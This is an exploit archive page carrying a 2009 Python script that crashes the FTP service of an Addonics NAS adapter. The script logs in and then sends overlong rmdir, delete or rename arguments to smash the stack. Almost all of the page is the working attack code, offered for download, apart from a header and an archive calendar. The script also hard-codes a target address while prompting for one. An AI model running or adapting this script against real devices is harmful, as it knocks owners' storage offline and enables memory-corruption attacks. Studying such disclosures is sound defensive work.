exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Addonics NAS Adapter FTP Denial Of Service

Addonics NAS Adapter FTP Denial Of Service
Posted May 3, 2009
Authored by h00die

Addonics NAS Adapter remote FTP server denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 873f1ca01bb0427aae2c7f7b63e103edc4b0e3982b7c4fce18737c13327ee837

Addonics NAS Adapter FTP Denial Of Service

Change Mirror Download
#!/usr/bin/python
######################################################
# Addonics NAS Adapter FTP server DoS
# Tested against NASU2FW41 Loader 1.17
# Coded by Mike Cyr, aka h00die
# mcyr2 at csc dot_____________com
# Notes: Since the HTTP server was so vulnerable, is
# this really a suprise?
# Greetz to muts and loganWHD, I tried harder
# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily
# Log: Vendor notification March 25, 2009
# Vendor response March 26, 2009
# Milw0rm release May 1, 2009
######################################################

import socket
import sys

buffer= 'a'
counter=1

ip = raw_input("IP: ")
un = raw_input("Username: ")
password = raw_input("Password: ")

print "Vulnerable commands"
print "1. rmdir"
print "2. delete"
print "3. rename"
command = raw_input("Command to crash (#): ")

if command == "1":
print "fuzzing " + ip + " with command rmdir"
elif command == "2":
print "fuzzing " + ip + " with command delete"
elif command == "3":
print "fuzzing " + ip + " with command rename"
else:
print "your an idiot"
sys.exit(1)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.2.101',21))
print s.recv(1024)
s.send('USER ' + un + '\r\n')
print s.recv(1024)
s.send('PASS ' + password + '\r\n')
print s.recv(1024)
if command == "1":
while len(buffer) <=512:
buffer = buffer + 'a'
counter=counter+1
s.send('XRMD ' + buffer + '\r\n')
print 'rmdir ' + buffer + '\r\n'
elif command == "2":
while len(buffer) <=523:
buffer = buffer + 'a'
counter=counter+1
s.send('delete ' + buffer + '\r\n')
elif command == "3":
while len(buffer) <=526:
buffer = buffer + 'a'
counter=counter+1
s.send('RNFR ' + buffer + '\r\n')
answer=s.recv(1024)
s.send('RNTO ' + buffer + '\r\n')
answer=s.recv(1024)
if (answer == "550 Requested action not taken.\r\n"):
print "Stack smashed"
else:
print "fail: " + answer
s.close()


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close